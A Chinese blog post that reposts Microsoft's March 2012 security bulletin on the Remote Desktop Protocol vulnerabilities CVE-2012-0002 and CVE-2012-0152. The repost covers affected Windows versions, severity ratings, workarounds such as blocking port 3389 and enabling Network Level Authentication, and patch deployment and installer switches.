几年前就看到有人在吵远程桌面溢出,不过神龙见首不见尾,它就是春哥一样,永远是个传说!
最近服务器频繁的出补丁,又见微软官方出来证实,传说不再是传说了,几百万的0日真的面世了。
看一下微软怎么说吧,昨天微软刚刚发布的:http://support.microsoft.com/kb/2671387
Enable | Disable |
---|---|
Fix this problem
Microsoft Fix it 50844 |
Fix this problem
Microsoft Fix it 50845 |
发布时间: 2012年3月13日
版本: 1.0
此安全更新可解决远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。
对于 Microsoft Windows 所有受支持的版本,此安全更新的等级为“严重”。有关详细信息,请参阅本节中“受影响和不受影响的软件”小节。
该安全更新通过修改远程桌面协议处理内存中数据包的方式以及 RDP 服务处理数据包的方式来解决漏洞。有关这些漏洞的详细信息,请参阅下一节“漏洞信息”下面特定漏洞条目的“常见问题 (FAQ)”小节。
建议。 大多数客户均启用了“自动更新”,他们不必采取任何操作,因为此安全更新将自动下载并安装。尚未启用“自动更新”的客户必须检查更新,并手动安装此更新。有关自动更新中特定配置选项的信息,请参阅 Microsoft 知识库文章 294871。
对于管理员、企业安装或者想要手动安装此安全更新的最终用户,Microsoft 建议客户使用更新管理软件立即应用此更新或者利用 Microsoft Update 服务检查更新。
另请参阅本公告后面部分中的“检测和部署工具及指导”一节。
已知问题。 Microsoft 知识库文章 2671387 介绍了客户在安装此安全更新时可能遇到的当前已知问题。本文还介绍了这些问题的建议解决办法。
Top of section已对下列软件进行测试,以确定受到影响的版本。其他版本的支持生命周期已结束或者不受影响。要确定软件版本的技术支持生命周期,请访问 Microsoft 技术支持生命周期。
受影响的软件
操作系统 | 最大安全影响 | 综合严重等级 | 此更新替代的公告 |
---|---|---|---|
Windows XP Service Pack 3 (KB2621440) |
远程执行代码 | 严重 | MS11-065 中的 KB2570222 由 KB2621440 替代 |
Windows XP Professional x64 Edition Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | MS11-065 中的 KB2570222 由 KB2621440 替代 |
Windows Server 2003 Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | MS11-065 中的 KB2570222 由 KB2621440 替代 |
Windows Server 2003 x64 Edition Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | MS11-065 中的 KB2570222 由 KB2621440 替代 |
Windows Server 2003 SP2(用于基于 Itanium 的系统) (KB2621440) |
远程执行代码 | 严重 | MS11-065 中的 KB2570222 由 KB2621440 替代 |
Windows Vista Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | 没有公告由 KB2621440 替代 |
Windows Vista x64 Edition Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | 没有公告由 KB2621440 替代 |
Windows Server 2008(用于 32 位系统)Service Pack 2* (KB2621440) |
远程执行代码 | 严重 | 没有公告由 KB2621440 替代 |
Windows Server 2008(用于基于 x64 的系统)Service Pack 2* (KB2621440) |
远程执行代码 | 严重 | 没有公告由 KB2621440 替代 |
Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2 (KB2621440) |
远程执行代码 | 严重 | 没有公告由 KB2621440 替代 |
Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 (KB2621440) Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 (KB2667402) |
远程执行代码 | 严重[1] | 没有公告由 KB2621440 替代 没有公告由 KB2667402 替代 |
Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 (KB2621440) Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 (KB2667402) |
远程执行代码 | 严重[1] | 没有公告由 KB2621440 替代 没有公告由 KB2667402 替代 |
Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1* (KB2621440) Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1* (KB2667402) |
远程执行代码 | 严重[1] | 没有公告由 KB2621440 替代 没有公告由 KB2667402 替代 |
Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 (KB2621440) Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 (KB2667402) |
远程执行代码 | 严重[1] | 没有公告由 KB2621440 替代 没有公告由 KB2667402 替代 |
*服务器核心安装受到影响。此更新适用于 Windows Server 2008 或 Windows Server 2008 R2 的受支持版本,严重等级相同,无论是否使用“服务器核心”安装选项进行了安装。有关此安装选项的详细信息,请参阅 TechNet 文章管理服务器核心安装和服务服务器核心安装。注意,服务器核心安装选项不适用于 Windows Server 2008 和 Windows Server 2008 R2 的某些版本;请参阅比较服务器核心安装选项。
[1]更新程序包 KB2621440 解决 CVE-2012-0002,更新程序包 KB2667402 解决 CVE-2012-0152。如果在受影响的 Microsoft Windows 版本上,CVE-2012-0152 的严重等级低于 KB2621440,则根据 CVE-2012-0002,综合严重等级为“严重”。客户应该应用为其系统安装的 Microsoft Windows 版本提供的所有更新。
Top of section在哪里可以找到文件信息详细资料?
有关文件信息详细资料的位置,请参阅“安全更新部署”部分中的参考表。
Windows Developer Preview是否 受 此公告解决的任何漏洞影响?
是。KB2621440 更新适用于 Windows Developer Preview 版本。鼓励使用 Windows Developer Preview 的客户向其系统应用此更新。此更新仅在 Windows Update 上提供。
我正在运行受影响的操作系统,但是没有启用远程桌面协议 (RDP)。是否仍将为我提供此更新?
是。虽然未启用 RDP 的系统不受这些漏洞威胁,但是仍向未启用 RDP 的客户提供了此更新,以帮助确保保护其系统。
我的系统上安装的 Microsoft Windows 版本列出了两个更新。我需要两个更新都安装吗?
是。客户应该应用为其系统上安装的 Microsoft Windows 版本提供的所有更新。
我需要按特定顺序安装这些安全更新吗?
否。一个受影响系统的多个更新可以以任何顺序应用。
我正在使用本安全公告中讨论的软件的较旧版本。我该怎么办?
已对本公告中列出的受影响的软件进行测试,以确定受到影响的版本。其他版本的支持生命周期已结束。有关产品生命周期的详细信息,请访问 Microsoft 产品技术支持生命周期网站。
使用该软件的较旧版本的客户应优先考虑迁移到受支持的版本,以防止可能会受到新出现漏洞的影响。要确定您的软件版本的技术支持生命周期,请参阅选择一项产品以获取生命周期信息。有关这些软件版本的 Service Pack 的详细信息,请参阅Service Pack 生命周期支持策略。
如果用户需要获得较旧软件的定制支持,则必须与其 Microsoft 客服小组代表、其技术客户经理或适当的 Microsoft 合作伙伴代表联系以了解定制支持选项。没有联合合同、优先支持合同或授权合同的客户可与其当地的 Microsoft 销售分支机构联系。有关联系信息,请访问 Microsoft Worldwide Information 网站,在联系信息列表中选择国家/地区,然后单击“Go”以查看电话号码列表。在拨打电话时,请找当地的“企业技术咨询支持服务”销售经理进行洽谈。有关详细信息,请参阅 Microsoft 技术支持生命周期策略常见问题。
Top of section以下严重等级假设漏洞的可能的最大影响。有关此安全公告发布 30 天内,漏洞利用的安全等级和安全影响的可能性的信息,请参阅 3 月份公告摘要中的利用指数。有关详细信息,请参阅 Microsoft 利用指数。
受影响的软件 | 远程桌面协议漏洞 - CVE-2012-0002 (KB2621440) | 终端服务器拒绝服务漏洞 - CVE-2012-0152 (KB2667402) | 综合严重等级 |
---|---|---|---|
Windows XP Service Pack 3 | 严重 远程执行代码 |
不适用 | 严重 |
Windows XP Professional x64 Edition Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2003 Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2003 x64 Edition Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2003 SP2(用于基于 Itanium 的系统) | 严重 远程执行代码 |
不适用 | 严重 |
Windows Vista Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows Vista x64 Edition Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2008(用于 32 位系统)Service Pack 2* | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2008(用于基于 x64 的系统)Service Pack 2* | 严重 远程执行代码 |
不适用 | 严重 |
Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2 | 严重 远程执行代码 |
不适用 | 严重 |
Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 | 严重 远程执行代码 |
中等 拒绝服务 |
严重 |
Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 | 严重 远程执行代码 |
中等 拒绝服务 |
严重 |
Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1* | 严重 远程执行代码 |
重要 拒绝服务 |
严重 |
Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 | 严重 远程执行代码 |
重要 拒绝服务 |
严重 |
*服务器核心安装受到影响。此更新适用于 Windows Server 2008 或 Windows Server 2008 R2 的受支持版本,严重等级相同,无论是否使用“服务器核心”安装选项进行了安装。有关此安装选项的详细信息,请参阅 TechNet 文章管理服务器核心安装和服务服务器核心安装。注意,服务器核心安装选项不适用于 Windows Server 2008 和 Windows Server 2008 R2 的某些版本;请参阅比较服务器核心安装选项。
Top of section远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
要在“常见漏洞和披露”列表中以标准条目查看此漏洞,请参阅 CVE-2012-0002。
缓解是指一种设置、通用配置或者一般的最佳实践,它以默认状态存在,能够降低利用漏洞的严重性。以下缓解因素在您遇到的情形中可能会有所帮助:
变通办法是指一种设置或配置更改,它不能从根本上纠正漏洞,但有助于在应用更新之前封堵已知的攻击源。Microsoft 已测试了以下变通方法,并在讨论中指明了变通方法是否会降低功能性:
如果您的系统不再需要这些服务,作为安全最佳做法,请考虑禁用它们。禁用无用的和不需要的服务有助于减少出现安全漏洞的可能性。
有关如何手动禁用远程桌面的信息,请参阅禁用远程桌面。
有关如何使用组策略禁用远程桌面的信息,请参阅 Microsoft 知识库文章 306300。
有关远程协助的信息(包括如何使用组策略手动禁用远程协助的说明),请参阅 TechNet 文章远程协助。
有关如何禁用 Windows Small Business Server 2003 终端服务和远程工作网站功能的信息,请参阅 TechNet 文章保护您的 Windows Small Business Server 2003 网络。
TCP 端口 3389 用于启动与受影响组件的连接。将此端口阻止在网络外围防火墙处,有助于保护位于防火墙后面的系统免受利用此漏洞进行的攻击。这样可以帮助保护网络免受从企业外部发起的攻击。帮助避免来自 Internet 的攻击的最佳防御方法是:在企业周边屏蔽受影响的端口。但是,系统仍然会受到来自企业内部的攻击。
此外,对于 Windows XP 和 Windows Server 2003,Windows 防火墙可以帮助保护单台计算机。除了在 Windows XP Service Pack 2 中的防火墙中启用了远程桌面功能的情况之外,默认情况下,Windows 防火墙不允许连接到此端口。有关如何在这些平台上禁用 Windows 防火墙中的“远程桌面”例外的信息,请参阅 TechNet 文章启用或禁用远程桌面防火墙规则。如果您无法禁用 Windows 防火墙中的“远程桌面”例外,您可以设置所有计算机(包括 Internet 上的计算机)的默认值,将此漏洞的影响范围缩小至本地网络。这样有助于减少来自 Internet 的攻击的可能性。
注意 Windows Small Business Server 2003 使用远程工作网站功能。此功能使用 TCP 端口 4125 来侦听 RDP 连接。如果您使用此功能,您应该验证此端口和端口 3389 是否都已被屏蔽。
注意 可以手动将受影响的组件更改为使用其他端口。如果您已执行这些操作,您也应该屏蔽其他端口。
注意 要使用自动 Microsoft Fix it 解决方案来启用此变通办法,请参阅 Microsoft 知识库文章 2671387。
您可以启用网络级别身份验证以阻止未经身份验证的攻击者利用此漏洞。启用网络级别身份验证时,攻击者首先需要使用目标系统上的有效帐户向远程桌面服务进行身份验证,然后才能利用该漏洞。
为使用网络级别身份验证,您的环境必须满足下列要求:
要为某个连接配置网络级别身份验证,请执行以下步骤:
变通办法的影响。 不支持凭据安全支持提供程序 (CredSSP) 协议的客户端计算机不能访问受网络级别身份验证保护的服务器。注意 对于在 Windows XP Service Pack 3 系统需要使用远程桌面的混合网络环境中部署此变通办法的管理员,请参阅 Microsoft 知识库文章 951608 了解有关如何 Windows XP Service Pack 3 上启用 CredSSP 的信息。
有关网络级别身份验证的更多信息,包括如何使用组策略启用网络级别身份验证,请参阅参阅 Technet 文章为远程桌面服务连接配置网络级别身份验证。
此漏洞的影响范围有多大?
这是一个远程执行代码漏洞。
造成此漏洞的原因是什么?
当远程桌面协议处理一系列特制数据包,导致访问内存中未正确被初始化或删除的对象时,将导致该漏洞。
什么是远程桌面协议 (RDP)?
远程桌面协议 (RDP) 允许用户在其桌面计算机上创建虚拟会话。RDP 允许远程用户访问其计算机上的所有数据和应用程序。有关详细信息,请参阅 MSDN 文章远程桌面协议。
远程桌面默认情况下被启用?
否,默认情况下未对管理启用 RDP。但是,尚未启用 RDP 的客户仍将被提供此更新,以帮助确保其系统受到保护。有关此配置设置的详细信息,请参阅 TechNet 文章如何在 Windows Server 2003 中对管理启用和配置远程桌面。
什么是远程桌面服务的网络级别身份验证?
网络级别身份验证是一种可用于增强 RD 会话主机服务器安全性的身份验证方法,要求在创建会话之前用户向 RD 会话主机服务器进行身份验证。有关网络级别身份验证的详细信息,请参阅 TechNet 文章为远程桌面服务连接配置网络级别身份验证。
攻击者可能利用此漏洞执行什么操作?
成功利用此漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
攻击者如何利用此 漏洞?
对于运行 Windows XP 和 Windows Server 2003 的受支持版本的系统,未经身份验证的远程攻击者可以通过向目标系统发送一系列特制 RDP 数据包来利用此漏洞。
对于运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本并且禁用了网络级别身份验证的系统,未经身份验证的远程攻击者可以通过向目标系统发送一系列特制 RDP 数据包来利用此漏洞。
对于运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 并且启用了“网络级别身份验证”的系统,攻击者首先需要使用目标系统上的有效帐户向远程桌面服务进行身份验证。然后,攻击者可以通过向目标系统发送一系列特制 RDP 数据包来利用此漏洞。
受此漏洞威胁最大的系统有哪些?
终端服务器受此漏洞的威胁最大。没有启用 RDP 的系统不受威胁。此外,运行 Windows Vista、Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的受支持版本且启用了网络级别身份验证的系统受威胁的风险会减少,因为攻击者首先需要向服务进行身份验证。
此更新有什么作用?
该更新通过修改远程桌面协议处理内存中数据包的方式来解决漏洞。
发布此安全公告时,此漏洞是否已公开披露?
否。Microsoft 通过协调漏洞披露渠道了解到有关此漏洞的信息。
在发布此安全公告时,Microsoft 是否收到任何有关此漏洞已被利用的报告?
否。在最初发布此安全公告时,Microsoft 未收到任何表明此漏洞已公开用于攻击用户的信息。
远程桌面协议服务处理数据包的方式中存在一个拒绝服务漏洞。成功利用此漏洞的攻击者可能导致目标服务停止响应。
要在“常见漏洞和披露”列表中以标准条目查看此漏洞,请参阅 CVE-2012-0152。
缓解是指一种设置、通用配置或者一般的最佳实践,它以默认状态存在,能够降低利用漏洞的严重性。以下缓解因素在您遇到的情形中可能会有所帮助:
Microsoft 并未发现此漏洞的任何变通办法。
Top of section此漏洞的影响范围有多大?
这是一个拒绝服务漏洞。
造成此漏洞的原因是什么?
当远程桌面协议服务处理一系列特制数据包,使得服务停止响应时,会导致该漏洞。
什么是远程桌面协议 (RDP)?
远程桌面协议 (RDP) 允许用户在其桌面计算机上创建虚拟会话。RDP 允许远程用户访问其计算机上的所有数据和应用程序。有关详细信息,请参阅 MSDN 文章远程桌面协议。
远程桌面默认情况下被启用?
否,默认情况下未对管理启用 RDP。但是,尚未启用 RDP 的客户仍将被提供此更新,以帮助确保其系统受到保护。有关此配置设置的详细信息,请参阅 TechNet 文章如何在 Windows Server 2003 中对管理启用和配置远程桌面。
攻击者可能利用此漏洞执行什么操作?
成功利用此漏洞的攻击者可能导致 RDP 服务停止响应。
攻击者如何利用此漏洞?
未经身份验证的远程攻击者可以通过向目标系统发送一系列特制数据包来利用此漏洞。
受此漏洞威胁最大的系统有哪些?
终端服务器受此漏洞的威胁最大。没有启用 RDP 的系统不受威胁。
此更新有什么作用?
该更新通过修改 RDP 服务处理数据包的方式来解决漏洞。
发布此安全公告时,此漏洞是否已公开披露?
否。Microsoft 通过协调漏洞披露渠道了解到有关此漏洞的信息。
在发布此安全公告时,Microsoft 是否收到任何有关此漏洞已被利用的报告?
否。在最初发布此安全公告时,Microsoft 未收到任何表明此漏洞已公开用于攻击用户的信息。
安全中心
管理需要部署到组织中的服务器、台式机和移动系统的软件和安全更新。有关详细信息,请参阅 TechNet 更新管理中心。Microsoft TechNet 安全网站提供了有关 Microsoft 产品安全的详细信息。
安全更新可从 Microsoft Update 和 Windows Update 获得。Microsoft 下载中心也提供了安全更新。通过输入关键字“安全更新”可以非常方便地找到这些更新。
最后,可以从 Microsoft Update 目录下载安全更新。Microsoft Update 目录提供通过 Windows Update 和 Microsoft Update 提供的内容的可搜索目录,包括安全更新、驱动程序和 Service Pack。通过使用安全公告编号(例如“MS07-036”)进行搜索,您可以将所有适用的更新添加到您的篮(包括某个更新的不同语言),然后将其下载到您选择的文件夹。有关 Microsoft Update 目录的详细信息,请参阅 Microsoft Update 目录常见问题。
检测和部署指南
Microsoft 提供安全更新的检测和部署指南。该指南包含可帮助 IT 专业人员了解如何使用各种工具检测和部署安全更新的建议和信息。有关详细信息,请参阅 Microsoft 知识库文章 961747。
Microsoft Baseline Security Analyzer
管理员可使用 Microsoft Baseline Security Analyzer (MBSA),在本地和远程系统中扫描缺少的安全更新和常见的安全配置错误。有关 MBSA 的详细信息,请访问 Microsoft Baseline Security Analyzer。
下表提供此安全更新的 MBSA 检测摘要。
软件 | MBSA |
---|---|
Windows XP Service Pack 3 | 是 |
Windows XP Professional x64 Edition Service Pack 2 | 是 |
Windows Server 2003 Service Pack 2 | 是 |
Windows Server 2003 x64 Edition Service Pack 2 | 是 |
Windows Server 2003 SP2(用于基于 Itanium 的系统) | 是 |
Windows Vista Service Pack 2 | 是 |
Windows Vista x64 Edition Service Pack 2 | 是 |
Windows Server 2008(用于 32 位系统)Service Pack 2 | 是 |
Windows Server 2008(用于基于 x64 的系统)Service Pack 2 | 是 |
Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2 | 是 |
Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 | 是 |
Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 | 是 |
Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1 | 是 |
Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 | 是 |
注意 对于使用不受最新版 MBSA、Microsoft Update 和 Windows Server Update Services 支持的旧版软件的客户,请访问 Microsoft Baseline Security Analyzer 并参考旧版产品支持部分,了解如何使用旧版工具创建全面的安全更新检测。
Windows Server Update Services
Windows Server Update Services (WSUS) 使信息技术管理员能够将最新的 Microsoft 产品更新部署到运行 Windows 操作系统的计算机。有关如何使用 Windows Server Update Services 部署安全更新的详细信息,请参阅 TechNet 文章 Windows Server Update Services。
Systems Management Server
下表提供此安全更新的 SMS 检测和部署摘要。
软件 | SMS 2003(带 ITMU) | Configuration Manager 2007 |
---|---|---|
Windows XP Service Pack 3 | 是 | 是 |
Windows XP Professional x64 Edition Service Pack 2 | 是 | 是 |
Windows Server 2003 Service Pack 2 | 是 | 是 |
Windows Server 2003 x64 Edition Service Pack 2 | 是 | 是 |
Windows Server 2003 SP2(用于基于 Itanium 的系统) | 是 | 是 |
Windows Vista Service Pack 2 | 是 | 是 |
Windows Vista x64 Edition Service Pack 2 | 是 | 是 |
Windows Server 2008(用于 32 位系统)Service Pack 2 | 是 | 是 |
Windows Server 2008(用于基于 x64 的系统)Service Pack 2 | 是 | 是 |
Windows Server 2008(用于基于 Itanium 的系统)Service Pack 2 | 是 | 是 |
Windows 7(用于 32 位系统)和 Windows 7(用于 32 位系统)Service Pack 1 | 是 | 是 |
Windows 7(用于基于 x64 的系统)和 Windows 7(用于基于 x64 的系统)Service Pack 1 | 是 | 是 |
Windows Server 2008 R2(用于基于 x64 的系统)和 Windows Server 2008 R2(用于基于 x64 的系统)Service Pack 1 | 是 | 是 |
Windows Server 2008 R2(用于基于 Itanium 的系统)和 Windows Server 2008 R2(用于基于 Itanium 的系统)Service Pack 1 | 是 | 是 |
注意 Microsoft 在 2011 年 4 月 12 日之后不再对 SMS 2.0 提供支持。对于 SMS 2003,Microsoft 在 2011 年 4 月 12 日之后也不再对安全更新清单工具 (SUIT) 提供支持。鼓励客户升级到 System Center Configuration Manager 2007。对于保留使用 SMS 2003 Service Pack 3 的客户,Microsoft 更新清单工具 (ITMU) 也是一种选择。
对于 SMS 2003,SMS 可以使用 Microsoft 更新 SMS 2003 清单工具 (ITMU) 检测 Microsoft Update 提供的以及 Windows Server Update Services 支持的安全更新。有关 SMS 2003 ITMU 的详细信息,请参阅 SMS 2003 Microsoft 更新清单工具。有关 SMS 扫描工具的详细信息,请参阅 SMS 2003 软件更新扫描工具。请参阅 Systems Management Server 2003 下载。
System Center Configuration Manager 2007 使用 WSUS 3.0 来检测更新。有关 Configuration Manager 2007 软件更新管理的详细信息,请访问 System Center Configuration Manager 2007。
有关 SMS 的详细信息,请访问 SMS 网站。
有关详细信息,请参阅 Microsoft 知识库文章 910723: 每月检测和部署指南文章的摘要列表。
更新兼容性评估程序和应用程序兼容性工具箱
此更新通常写入运行应用程序所必需的相同文件和注册表设置。这可触发不兼容并使安全更新的部署占用更多的时间。通过使用应用程序兼容性工具包中包含的更新兼容性评估程序组件,您可以简化测试和验证对已安装程序进行的 Windows 更新。
应用程序兼容性工具包 (ACT) 包含必要的工具和文档,以便在您的环境中部署 Windows Vista、Windows Update、Microsoft Security Update 或新版本的 Windows Internet Explorer 之前评估和缓减应用程序的兼容性问题。
Top of section受影响的软件
有关您的受影响软件的特定安全更新信息,请单击相应的链接:
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 |
部署 | |
没有用户干预的安装 | 对于 Windows XP Service Pack 3: WindowsXP-KB2621440-x86-ENU.exe /quiet |
对于 Windows XP Professional x64 Edition Service Pack 2: WindowsServer2003.WindowsXP-KB2621440-x64-ENU.exe /quiet |
|
安装而不重新启动 | 对于 Windows XP Service Pack 3: WindowsXP-KB2621440-x86-ENU.exe /norestart |
对于 Windows XP Professional x64 Edition Service Pack 2: WindowsServer2003.WindowsXP-KB2621440-x64-ENU.exe /norestart |
|
更新日志文件 | KB2621440.log |
更多信息 | 请参阅“检测和部署工具及指导”小节 |
重新启动要求 | |
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 |
HotPatching | 不适用 |
删除信息 | 使用控制面板中的“添加或删除程序”项或 %Windir%\$NTUninstallKB2621440$\Spuninst 文件夹中的 Spuninst.exe 实用程序 |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 |
注册表项 验证 | 对于 Windows XP 所有受支持的 32 位版本: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP4\KB2621440\Filelist |
对于 Windows XP 的所有受支持的基于 x64 的版本: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP Version 2003\SP3\KB2621440\Filelist |
注意 Windows XP Professional x64 Edition 的受支持版本的更新也适用于 Windows Server 2003 x64 Edition 的受支持版本。
安装更新
当您安装此安全更新时,安装程序将检查系统中正在更新的一个或多个文件是否已由 Microsoft 修补程序更新。
如果以前安装的修补程序已经更新过其中的某个文件,安装程序就会将 RTMQFE、SP1QFE 或 SP2QFE 文件复制到系统中。否则,安装程序将 RTMGDR、SP1GDR 或 SP2GDR 文件复制到您的系统中。安全更新可能不包含这些文件的所有版本。有关此行为的详细信息,请参阅 Microsoft 知识库文章 824994。
有关安装程序的详细信息,请参阅 Microsoft 知识库文章 832475。
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/help | 显示命令行选项。 |
安装模式 | |
/passive | 无人参与安装模式。无需用户交互操作,但会显示安装状态。如果安装结束时需要重新启动,将显示一个带有计时器的对话框,警告计算机将在 30 秒后重新启动。 |
/quiet | 安静模式。这与无人参与模式相同,但是不显示任何状态或错误消息。 |
重新启动选项 | |
/norestart | 安装完成后不重新启动。 |
/forcerestart | 安装后重新启动计算机,且在关机时强制其他应用程序关闭而不先保存打开的文件。 |
/warnrestart[:x] | 显示一个带有计时器的对话框,警告计算机将在 x 秒后重新启动。(默认设置为 30 秒。) 与 /quiet 开关或 /passive 开关一起使用。 |
/promptrestart | 显示提示本地用户允许重新启动的对话框。 |
特殊选项 | |
/overwriteoem | 不经提示而覆盖 OEM 文件。 |
/nobackup | 不备份卸载所需的文件。 |
/forceappsclose | 在计算机关机时强制关闭其他程序。 |
/log:path | 允许重定向安装日志文件。 |
/integrate:path | 将更新集成到 Windows 源文件中。这些文件位于开关中指定的路径中。 |
/extract[:path] | 提取文件而不启动安装程序。 |
/ER | 启用扩展错误报告功能。 |
/verbose | 启用详细日志记录。在安装期间,创建 %Windir%\CabBuild.log。此日志详述了被复制的文件。使用此开关可能导致安装过程变慢。 |
注意 可以将这些开关组合到一个命令中。为了保持向后兼容,此安全更新还支持以前版本的安装程序所使用的安装开关。有关受支持的安装开关的详细信息,请参阅 Microsoft 知识库文章 262841。
删除更新
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
/help | 显示命令行选项。 |
安装模式 | |
/passive | 无人参与安装模式。无需用户交互操作,但会显示安装状态。如果安装结束时需要重新启动,将显示一个带有计时器的对话框,警告计算机将在 30 秒后重新启动。 |
/quiet | 安静模式。这与无人参与模式相同,但是不显示任何状态或错误消息。 |
重新启动选项 | |
/norestart | 安装完成后不重新启动 |
/forcerestart | 安装后重新启动计算机,且在关机时强制其他应用程序关闭而不先保存打开的文件。 |
/warnrestart[:x] | 显示一个带有计时器的对话框,警告计算机将在 x 秒后重新启动。(默认设置为 30 秒。) 与 /quiet 开关或 /passive 开关一起使用。 |
/promptrestart | 显示提示本地用户允许重新启动的对话框。 |
特殊选项 | |
/forceappsclose | 在计算机关机时强制关闭其他程序。 |
/log:path | 允许重定向安装日志文件。 |
验证是否已应用更新
要验证受影响的系统上是否应用了安全更新,可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。有关详细信息,请参阅本公告前面的“检测和部署工具及指导”一节。
由于 Microsoft Windows 有多个版本,因此以下步骤可能会与您的系统上的步骤不同。如果不同,请参阅产品文档来完成这些步骤。
您也可以通过查看本节“参考表”中列出的注册表项来验证此安全更新安装的文件。
这些注册表项可能不包含已安装文件的完整列表。另外,如果管理员或 OEM 将此安全更新集成或组合到 Windows 安装源文件中,则可能无法正确创建这些注册表项。
参考表
下表包含此软件的安全更新信息。您可以在本节的“部署信息”小节中找到更多信息。
包括在以后的 Service Pack 中 | 此问题的更新程序将包含在以后的 Service Pack 或更新汇总中 | |
部署 | ||
没有用户干预的安装 | 对于 Windows Server 2003 所有受支持的 32 位版本: WindowsServer2003-KB2621440-x86-ENU.exe /quiet |
|
对于 Windows Server 2003 所有受支持的基于 x64 的版本: WindowsServer2003.WindowsXP-KB2621440-x64-ENU.exe /quiet |
||
对于 Windows Server 2003 所有受支持的基于 Itanium 的版本: WindowsServer2003-KB2621440-ia64-ENU.exe /quiet |
||
安装而不重新启动 | 对于 Windows Server 2003 所有受支持的 32 位版本: WindowsServer2003-KB2621440-x86-ENU.exe /norestart |
|
对于 Windows Server 2003 所有受支持的基于 x64 的版本: WindowsServer2003.WindowsXP-KB2621440-x64-ENU.exe /norestart |
||
对于 Windows Server 2003 所有受支持的基于 Itanium 的版本: WindowsServer2003-KB2621440-ia64-ENU.exe /norestart |
||
更新日志文件 | KB2621440.log | |
更多信息 | 请参阅“检测和部署工具及指导”小节 | |
重新启动要求 | ||
要求重新启动? | 是,应用此安全更新后必须重新启动系统。 | |
HotPatching | 此安全更新不支持 HotPatching。有关 Hotpatching 的详细信息,请参阅 Microsoft 知识库文章 897341。 | |
删除信息 | 使用控制面板中的“添加或删除程序”项或 %Windir%\$NTUninstallKB2621440$\Spuninst 文件夹中的 Spuninst.exe 实用程序 | |
文件信息 | 请参阅 Microsoft 知识库文章 2621440 | |
注册表项验证 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP3\KB2621440\Filelist |
注意 Windows Server 2003 x64 Edition 的受支持版本的更新也适用于 Windows XP Professional x64 Edition 的受支持版本。
安装更新
当您安装此安全更新时,安装程序将检查系统中正在更新的一个或多个文件是否已由 Microsoft 修补程序更新。
如果以前安装的修补程序已经更新过其中的某个文件,安装程序就会将 RTMQFE、SP1QFE 或 SP2QFE 文件复制到系统中。否则,安装程序将 RTMGDR、SP1GDR 或 SP2GDR 文件复制到您的系统中。安全更新可能不包含这些文件的所有版本。有关此行为的详细信息,请参阅 Microsoft 知识库文章 824994。
有关安装程序的详细信息,请参阅 Microsoft 知识库文章 832475。
有关此公告中出现的术语详细信息(如修补程序),请参阅 Microsoft 知识库文章 824684。
此安全更新支持以下安装开关。
开关 | 描述 |
---|---|
